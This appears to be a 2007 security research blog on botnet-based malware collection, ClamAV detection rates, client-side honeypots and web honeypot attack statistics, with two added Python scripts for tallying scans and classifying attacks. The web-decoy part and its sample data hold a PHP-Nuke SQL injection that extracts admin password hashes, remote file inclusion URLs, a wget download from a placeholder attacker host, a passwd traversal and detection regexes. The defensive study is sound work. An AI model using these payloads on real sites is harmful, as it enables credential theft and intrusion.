The SOCKS Diaries

Sunday, May 6. 2007
Something I should have blogged about several weeks ago: "The SOCKS Diaries" by William Salusky is a must-read.

Collecting Malware via Botnet Tracking

Friday, May 4. 2007
I blogged about collecting malware via botnet tracking in January this year. The whole system is now ready: when we track a botnet with botspy and find a URL, we download that URL and submit it to CWSandbox. The analysis report is then fed back into botspy, so we can also follow botnets that change the C&C server or install other kinds of remote control software. In total, we have collected 441 unique binaries that way during the last few weeks.

These binaries are typically some kind of bot or keylogger. Common AV software detects them rather poorly, presumably because the vendors do not have a sample yet. The following ClamAV report illustrates this (153 of the 441 files flagged, i.e. a detection rate of about 35%):
----------- SCAN SUMMARY -----------
Known viruses: 113987
Engine version: 0.90.1
Scanned directories: 1
Scanned files: 441
Infected files: 153
Data scanned: 222.17 MB
Time: 73.564 sec (1 m 13 s)

Results by signature (most frequent ones; "OK" means no detection):
288: OK
17: Exploit.DCOM.Gen
14: Trojan.Mybot-1445
6: Trojan.Spybot.gen-2
4: Trojan.SdBot-4179
4: Trojan.IRCBot-798
3: W32.Parite.B
3: Trojan.IRC.Flood.AQ
3: Trojan.Ioffer
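The per-signature tally above is the kind of thing that is easy to get wrong by hand (the "OK" lines have to stay in the denominator). As an added example, not code from the original post or from the botspy/CWSandbox setup, here is a small parser for clamscan output that produces the same "N: name" list, computes the detection rate, and cross-checks it against the SCAN SUMMARY block. The sample output is constructed: the file names are invented, the signature names are the ones ClamAV reported above.

```python
import re
from collections import Counter, namedtuple

# Constructed clamscan output for a 7-file directory (not from the original page).
SAMPLE_CLAMSCAN_OUTPUT = """\
/samples/0001.exe: Trojan.Mybot-1445 FOUND
/samples/0002.exe: OK
/samples/0003.exe: Exploit.DCOM.Gen FOUND
/samples/0004.exe: OK
/samples/0005.exe: Trojan.Mybot-1445 FOUND
/samples/0006.exe: OK
/samples/0007.exe: Trojan.SdBot-4179 FOUND

----------- SCAN SUMMARY -----------
Known viruses: 113987
Engine version: 0.90.1
Scanned directories: 1
Scanned files: 7
Infected files: 4
Data scanned: 3.21 MB
Time: 1.201 sec (0 m 1 s)
"""

# Per-file lines look like "<path>: <signature> FOUND" or "<path>: OK".
RESULT_RE = re.compile(r"^(?P<path>.+?): (?P<result>.+)$")
SUMMARY_RE = re.compile(r"^(?P<field>Scanned files|Infected files): (?P<n>\d+)$")

# results: 'OK' or signature name -> file count; skipped: other per-file results
# (files clamscan could not scan) -> count; summary: integer SCAN SUMMARY fields.
ScanReport = namedtuple("ScanReport", "results skipped summary")


def parse_clamscan(output):
    """Parse clamscan's stdout into a ScanReport."""
    results, skipped, summary = Counter(), Counter(), {}
    in_summary = False
    for line in output.splitlines():
        if line.startswith("----------- SCAN SUMMARY"):
            in_summary = True
            continue
        if in_summary:
            m = SUMMARY_RE.match(line)
            if m:
                summary[m.group("field")] = int(m.group("n"))
            continue
        m = RESULT_RE.match(line)
        if not m or line.startswith("LibClamAV"):
            continue  # blank lines and engine warnings
        result = m.group("result")
        if result == "OK":
            results["OK"] += 1
        elif result.endswith(" FOUND"):
            results[result[: -len(" FOUND")]] += 1
        else:
            skipped[result] += 1
    return ScanReport(results, skipped, summary)


def detection_rate(report):
    """Return (flagged, scanned, rate): rate is the share of files ClamAV named a signature for."""
    scanned = sum(report.results.values()) + sum(report.skipped.values())
    flagged = sum(report.results.values()) - report.results["OK"]
    return flagged, scanned, (flagged / scanned if scanned else 0.0)


def format_tally(report):
    """Lines in the post's 'N: name' format, most frequent first, ties by name."""
    return ["%d: %s" % (n, name)
            for name, n in sorted(report.results.items(), key=lambda kv: (-kv[1], kv[0]))]


def consistent_with_summary(report):
    """True if the per-file lines agree with the SCAN SUMMARY block. A mismatch usually
    means output was truncated or lines were dropped, so the computed rate is not trustworthy."""
    flagged, scanned, _ = detection_rate(report)
    return (report.summary.get("Scanned files") == scanned
            and report.summary.get("Infected files") == flagged)


if __name__ == "__main__":
    report = parse_clamscan(SAMPLE_CLAMSCAN_OUTPUT)
    flagged, scanned, rate = detection_rate(report)
    print("Detection rate: %d/%d = %.1f%%" % (flagged, scanned, 100 * rate))
    print("\n".join(format_tally(report)))
```

Run clamscan without `-i`/`--infected` when feeding it to this parser: that option suppresses the "OK" lines, and without them the denominator has to be taken from the summary instead.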

Presentation on Client-Side Honeypots

Thursday, May 3. 2007
Bing Yuan just finished his thesis on client-side honeypots. While the tool itself is not completely finished yet, his final presentation is available.

The basic idea of this thesis is to combine a component that drives Internet Explorer or other client-side applications (Word, PowerPoint, Winamp, Photoshop, ...) with CWSandbox. CWSandbox monitors the application in real time and flags suspicious activities such as newly created files, new processes, or new registry keys. That way, information about client-side exploits can be captured, something that is not possible with regular, server-based honeypots, which only see attacks against services they expose.

Call for Papers: 1st USENIX Workshop on Offensive Technologies (WOOT '07)

Wednesday, May 2. 2007
The Call for Papers for the 1st USENIX Workshop on Offensive Technologies (WOOT '07) is now available.

Important dates:
  • Paper submissions due: Thursday, June 7th, 2007, 11:59 p.m. PDT

  • Notification to authors: July 7th, 2007

  • Final papers due: July 31st, 2007

The workshop will be co-located with the 16th USENIX Security Symposium (Security '07), which will take place August 6–10, 2007.

About WOOT:
Progress in the field of computer security is driven by a symbiotic relationship between our understanding of attack and of defense. The USENIX Workshop on Offensive Technologies aims to bring together researchers and practitioners in system security to present research advancing the understanding of attacks on operating systems, networks, and applications.

Computer security is unique among systems disciplines in that practical details matter and concrete case studies keep the field grounded in practice. WOOT provides a forum for high-quality peer-reviewed papers for discussing tools and techniques for attack.

Submissions should reflect the state of the art in offensive computer security technology—either surveying previously poorly known areas or presenting entirely new attacks.

We are interested in work that could be presented at more traditional security forums, as well as more applied work that informs the field about the state of security practice in offensive techniques.

A significant goal is producing published artifacts that will inform future work in the field. Submissions will be peer-reviewed and shepherded as appropriate.

Web-based Honeypot Decoys: Results II

Wednesday, May 2. 2007
Here are some more statistics on the data we have collected with the help of Michael Müter's web-based honeypot decoys. PHP-Nuke is the most attractive target, presumably because of its large user base and its many security vulnerabilities in the past. Most of what we see are file inclusion or SQL injection attempts. These attacks often try to install backdoors written in PHP or defacing tools like the one from r3v3ng4ns.

Attacks per module:
PHP-Nuke: 266 Hits [81.85%]
php Shell: 49 Hits [15.08%]
phpBB: 5 Hits [1.54%]
phpMyAdmin: 5 Hits [1.54%]

Attack Types:
File Inclusion: 167 Hits [51.38%]
SQL injection: 110 Hits [33.85%]
Injection: 30 Hits [9.23%]
WGET: 14 Hits [4.31%]
XSS: 4 Hits [1.23%]
Defacement attempt: 3 Hits [0.92%]
Directory traversal: 3 Hits [0.92%]

Most often used attack patterns (sanitized):
http://www.XXXzero.com/wp-admin/c.in? : 36 Hits [11.08%]
p0hh0nsee%\') UNION ALL SELECT 1,2,aid,pwd,5,6,7,8,9,10 FROM nuke_authors/* : 34 Hits [10.46%]
http://XXXzero.com/c.in?? : 33 Hits [10.15%]
uname -a : 18 Hits [5.54%]
http://XXXbergsbuss.se/c.in? : 16 Hits [4.92%]
http://XXX.laughingllamas.com/fileupload/store/check.txt? : 5 Hits [1.54%]
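The attack-type and attack-pattern tables above come from classifying the query strings the decoys receive. As an added example, not code from the original post or from Michael Müter's decoys, here is a rule-based classifier that labels requests with the same taxonomy, builds the "N Hits [P%]" table, and extracts the URLs that remote file inclusion attempts point at (the "attack patterns" list). The request lines are constructed and modeled on the sanitized patterns above; the parameter names and the host attacker.example are placeholders, not observed values. The trailing `?` on the inclusion URLs is deliberate on the attacker's side: whatever the vulnerable script appends to the parameter (a `.php` suffix, a path component) then becomes a query string on the attacker's server instead of breaking the URL. Defacement attempts are not modeled.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qsl

# Constructed request lines (path + query string) as a web honeypot would log them.
# Not from the original page; hosts and parameter names are placeholders.
SAMPLE_REQUESTS = [
    "/modules.php?name=Search&query=p0hh0nsee%') UNION ALL SELECT 1,2,aid,pwd,5,6,7,8,9,10 FROM nuke_authors/*",
    "/index.php?page=http://attacker.example/c.in?",
    "/index.php?page=http://attacker.example/c.in??",
    "/modules.php?name=News&file=http://attacker.example/c.in?",
    "/shell.php?cmd=uname -a",
    "/shell.php?cmd=wget http://attacker.example/tool.txt",
    "/index.php?page=../../../../etc/passwd",
    "/index.php?q=<script>alert(1)</script>",
    "/index.php?page=about",
]

# (label, regex) pairs tested against each decoded parameter value; labels follow the
# post's taxonomy.  Order is priority: the most specific pattern wins when several match
# (a UNION SELECT payload may well contain "http://" or "../" as a decoy).
RULES = [
    ("SQL injection", re.compile(r"union\s+(all\s+)?select|\bfrom\s+nuke_\w+|'\s*(or|and)\b", re.I)),
    ("XSS", re.compile(r"<script|javascript:|\bon(error|load)\s*=", re.I)),
    ("Directory traversal", re.compile(r"\.\.[/\\]")),
    ("File Inclusion", re.compile(r"^(https?|ftp)://", re.I)),            # remote file inclusion
    ("WGET", re.compile(r"(^|[;|&`])\s*(wget|curl|fetch)\b", re.I)),      # fetch a tool onto the host
    ("Injection", re.compile(r"(^|[;|&`])\s*(uname|id|whoami|cat|ls|pwd)\b", re.I)),  # shell command
]
PRIORITY = {label: i for i, (label, _) in enumerate(RULES)}


def decoded_params(request):
    """(name, value) pairs of the query string, percent-decoded once.
    parse_qsl tolerates invalid escapes such as the %') in the PHP-Nuke payload."""
    return parse_qsl(urlsplit(request).query, keep_blank_values=True)


def classify_value(value):
    """First (most specific) rule label matching one parameter value, or None."""
    for label, pattern in RULES:
        if pattern.search(value):
            return label
    return None


def classify_request(request):
    """Highest-priority label over all parameters of the request, or None if benign."""
    labels = [classify_value(v) for _, v in decoded_params(request)]
    labels = [l for l in labels if l is not None]
    return min(labels, key=PRIORITY.__getitem__) if labels else None


def tally(requests):
    """Counter of attack labels; unclassified (benign) requests are not counted."""
    return Counter(lbl for lbl in map(classify_request, requests) if lbl)


def format_table(counts):
    """Lines in the post's 'label: N Hits [P%]' format, most frequent first, ties by name."""
    total = sum(counts.values())
    return ["%s: %d Hits [%.2f%%]" % (label, n, 100.0 * n / total)
            for label, n in sorted(counts.items(), key=lambda kv: (-kv[1], kv[0]))]


def inclusion_targets(requests):
    """URLs that remote file inclusion attempts pointed at, with counts (the raw
    'attack patterns' list; hostnames would still need sanitizing before publication)."""
    targets = Counter()
    for request in requests:
        for _, value in decoded_params(request):
            if classify_value(value) == "File Inclusion":
                targets[value] += 1
    return targets


if __name__ == "__main__":
    print("\n".join(format_table(tally(SAMPLE_REQUESTS))))
    for url, n in inclusion_targets(SAMPLE_REQUESTS).most_common():
        print("%s : %d Hits" % (url, n))
```

Two caveats for real decoy logs: the values are decoded only once, so double-encoded payloads need a second `unquote` pass before the rules run, and any keyword list like the one in the "Injection" rule will miss commands it does not know about, so unclassified requests are worth reviewing by hand rather than being dropped.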

Captured Downloads:
Total number of captured tools: 36
Average size of a captured tool: 61.22 KB
Total size of all captured tools: 2203.84 KB